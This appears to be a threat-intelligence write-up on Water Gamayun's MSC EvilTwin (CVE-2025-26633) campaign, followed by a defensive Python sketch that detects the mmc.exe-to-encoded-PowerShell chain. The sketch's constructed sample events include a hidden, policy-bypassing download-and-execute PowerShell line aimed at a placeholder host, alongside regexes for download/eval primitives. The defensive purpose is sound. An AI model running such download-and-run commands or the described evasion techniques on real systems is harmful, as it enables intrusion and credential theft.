Water Gamayun, a persistent threat group, has recently intensified its operations by exploiting the MSC EvilTwin vulnerability (CVE-2025-26633), a flaw in how the Microsoft Management Console (mmc.exe) handles .msc console files on Windows.
The campaign relies on multi-stage attacks against enterprise and government organizations to steal sensitive information and credentials and to maintain long-term access to compromised networks.
The attacks, first seen in 2025, combine the abuse of trusted Windows binaries with heavy obfuscation to slip past modern security controls, while presenting users with convincing lures such as fake hiring documents.
The attack begins when a user's web search lands on a compromised site, which silently redirects the victim to a lookalike domain. That domain serves a malicious RAR archive named "hiringassistant.pdf.rar", a double extension chosen so that the file passes as a PDF at a glance.
When the user opens the archive, the embedded payload drops a crafted .msc console file and exploits the MSC EvilTwin vulnerability to have mmc.exe load it. The console file abuses TaskPad task definitions, which MMC executes as shell commands, to launch hidden PowerShell.
Zscaler security analysts identified the campaign's distinctive approach: a sequence of password-protected archives (which defeat content inspection in transit), window-hiding code, and staged payload execution, all intended to conceal activity from both users and automated detection tools.
The Zscaler research team attributed the campaign to Water Gamayun based on several strong markers, including the rare abuse of the EvilTwin vulnerability, custom PowerShell obfuscation, and the use of decoy documents to lower suspicion.
Their analysis showed that, after establishing an initial foothold, the malware chain downloads additional executables, extracts further archives, and uses process injection to expand its reach.
Multi-Stage Payload and Hidden Execution
At the core of Water Gamayun's methodology is a layered infection process. After the disguised RAR archive is opened, the payload writes a .msc file to disk.
When that file is executed, mmc.exe parses its malicious snap-in data and runs Base64-encoded PowerShell through a TaskPad task. The PowerShell script, the first stage, downloads the legitimate UnRAR.exe command-line tool and uses it to extract password-protected archives containing the next payloads.
These scripts execute commands of the form:
-EncodedCommand JABX… | iex
The JAB prefix is the Base64 encoding of a UTF-16LE "$" followed by a letter, so it is a reliable marker that an encoded command opens with a PowerShell variable; the decoded text is piped to iex (Invoke-Expression), so the script body never appears in readable form on the command line.
A second-stage script compiles a small .NET module to hide the malware's windows from view, opens a decoy PDF for the victim, and drops the final loader executable, ItunesC.exe. The loader maintains long-term access by launching multiple instances of itself and quietly beaconing to external IP addresses.
The campaign shows how advanced obfuscation and multi-phase execution can evade detection. Defenders should monitor for uncommon and double-extension file names, PowerShell launched with -EncodedCommand (or any of its abbreviations), suspicious process chains such as mmc.exe spawning powershell.exe, and network connections to the campaign's infrastructure.
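As an added example, not code from Zscaler or from the article, the following Python sketch runs the checks a defender would want for the chain above over a few constructed process-creation events (Sysmon-style parent image, image and command line): a double-extension lure being opened, mmc.exe loading a .msc from a user-writable path, mmc.exe spawning PowerShell, and an -EncodedCommand argument that it decodes and inspects for download/eval primitives. Apart from hiringassistant.pdf.rar, every path, file name (update.msc) and URL is an assumption; example.invalid is a reserved, non-resolving domain.

```python
"""Detection sketch for the mmc.exe -> encoded PowerShell chain.

Added example, not code from Zscaler or from the article.  The events in
sample_events() are constructed to resemble Sysmon Event ID 1 records; apart
from hiringassistant.pdf.rar, every path, file name and URL is an assumption.
"""
from __future__ import annotations

import base64
import re
from pathlib import PureWindowsPath

# Primitives that turn a decoded script into a downloader/evaluator.
SUSPICIOUS_PS = re.compile(
    r"(?i)\biex\b|invoke-expression|\biwr\b|invoke-webrequest|downloadstring|frombase64string"
)
# Document-looking name whose real extension is an archive or executable.
DOUBLE_EXT = re.compile(r"(?i)\.(pdf|docx?|xlsx?|txt|jpe?g|png)\.(rar|zip|7z|exe|scr|js|lnk)\b")
# A drive-letter path ending in .msc anywhere on the command line.
MSC_ARG = re.compile(r'(?i)[a-z]:\\[^"]*?\.msc')
# Built-in console files live here; Temp, Downloads or AppData is odd.
TRUSTED_MSC_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way the attacker does: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the plaintext script if cmdline carries an encoded command, else None.

    powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -en,
    -enc, ...) plus the -ec alias, so match on prefix rather than the full switch.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if flag == "ec" or (flag.startswith("e") and "encodedcommand".startswith(flag)):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # switch present but blob is not valid UTF-16LE Base64
    return None


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def analyze_event(ev: dict) -> list[str]:
    """Return the reasons a single process-creation event looks like the chain."""
    parent, image, cmd = _basename(ev["parent_image"]), _basename(ev["image"]), ev["command_line"]
    reasons: list[str] = []

    # 1. Double-extension lure (hiringassistant.pdf.rar) being opened.
    if DOUBLE_EXT.search(cmd):
        reasons.append("double-extension archive lure")

    # 2. mmc.exe loading a console file from somewhere other than System32.
    if image == "mmc.exe":
        for m in MSC_ARG.finditer(cmd):
            if not m.group(0).lower().startswith(TRUSTED_MSC_DIRS):
                reasons.append(f"mmc.exe loading .msc outside System32: {m.group(0)}")

    # 3. mmc.exe spawning PowerShell: the TaskPad shell-command path.
    if parent == "mmc.exe" and image in ("powershell.exe", "pwsh.exe"):
        reasons.append("mmc.exe -> powershell.exe process chain")

    # 4. Encoded command present: decode it and look at what it actually runs.
    script = decode_encoded_command(cmd)
    if script is not None:
        reasons.append("encoded PowerShell command")
        if SUSPICIOUS_PS.search(script):
            reasons.append("decoded script uses a download/eval primitive")
    return reasons


def run_detection(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> reasons, for events that triggered at least one rule."""
    return {i: r for i, ev in enumerate(events) if (r := analyze_event(ev))}


def sample_events() -> list[dict]:
    """Constructed events mirroring the chain: lure -> mmc.exe -> hidden PowerShell."""
    stage1 = "$u='http://example.invalid/stage2.ps1'; (iwr $u -UseBasicParsing).Content | iex"
    return [
        {"parent_image": r"C:\Windows\explorer.exe",
         "image": r"C:\Program Files\WinRAR\WinRAR.exe",
         "command_line": r'"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\u\Downloads\hiringassistant.pdf.rar"'},
        {"parent_image": r"C:\Windows\explorer.exe",
         "image": r"C:\Windows\System32\mmc.exe",
         "command_line": r'"C:\Windows\System32\mmc.exe" "C:\Users\u\AppData\Local\Temp\update.msc"'},
        {"parent_image": r"C:\Windows\System32\mmc.exe",
         "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "command_line": "powershell.exe -w hidden -ep bypass -EncodedCommand " + encode_ps(stage1)},
        # Benign control: an administrator opening Computer Management.
        {"parent_image": r"C:\Windows\explorer.exe",
         "image": r"C:\Windows\System32\mmc.exe",
         "command_line": r'"C:\Windows\System32\mmc.exe" "C:\Windows\System32\compmgmt.msc"'},
    ]


if __name__ == "__main__":
    for idx, why in run_detection(sample_events()).items():
        print(idx, why)
```

Running the block reports the three malicious events with their reasons and stays silent on the benign Computer Management launch. The decoder deliberately matches any prefix of -EncodedCommand because powershell.exe does; a rule that looks only for the literal switch name misses -e and -enc, which is what most tooling in the wild actually passes.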
